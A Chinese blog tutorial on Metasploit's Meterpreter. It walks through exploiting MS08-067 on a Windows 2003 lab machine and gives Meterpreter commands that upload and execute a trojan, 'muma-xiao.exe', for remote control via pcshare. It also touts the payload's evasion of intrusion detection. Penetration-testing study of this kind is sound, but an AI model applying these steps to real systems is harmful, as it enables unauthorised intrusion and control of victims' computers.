meterpreter后期攻击使用方法

导读:本篇文章讲解 meterpreter后期攻击使用方法,希望对大家有帮助,欢迎收藏,转发!站点地址:www.bmabk.com

Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpretershell的链接。Meterpretershell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统]很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。最后,Meterpreter还可以简化任务创建多个会话。可以来利用这些会话进行渗透。

今天复现一个windows 2003的漏洞,代号为ms08-067
使用工具:Kali 、msfconsole、pcshare、windows 2003
具体步骤如下。

1.kali系统进入msfconsole

meterpreter后期攻击使用方法

2.搜索病毒代号输入search ms08-067

meterpreter后期攻击使用方法
meterpreter后期攻击使用方法

3.设置被攻击者的ip,也就是win2003的ip地址

meterpreter后期攻击使用方法
meterpreter后期攻击使用方法
meterpreter后期攻击使用方法
meterpreter后期攻击使用方法

4.开始攻击,显示攻击成功

meterpreter后期攻击使用方法

5.回到物理主机制造木马,同时上传到被攻击电脑windows 2003的c盘

meterpreter后期攻击使用方法
meterpreter后期攻击使用方法
meterpreter后期攻击使用方法
meterpreter后期攻击使用方法

6.输入以下命令将木马文件上传到被攻击者的电脑C盘,然后运行,具体看下面图片

upload //root//muma-xiao.exe c:\muma-xiao.exe
execute -f c://muma-xiao.exe
meterpreter后期攻击使用方法

总结:以上操作完毕后,win2003的c盘里就有了木马,名称为muma-xiao.exe,kali远程执行木马后,然后打开pcshare工具,即可以在图形化界面操控windows2003电脑

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/98712.html

(0)
小半的头像小半

相关推荐

极客之音——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!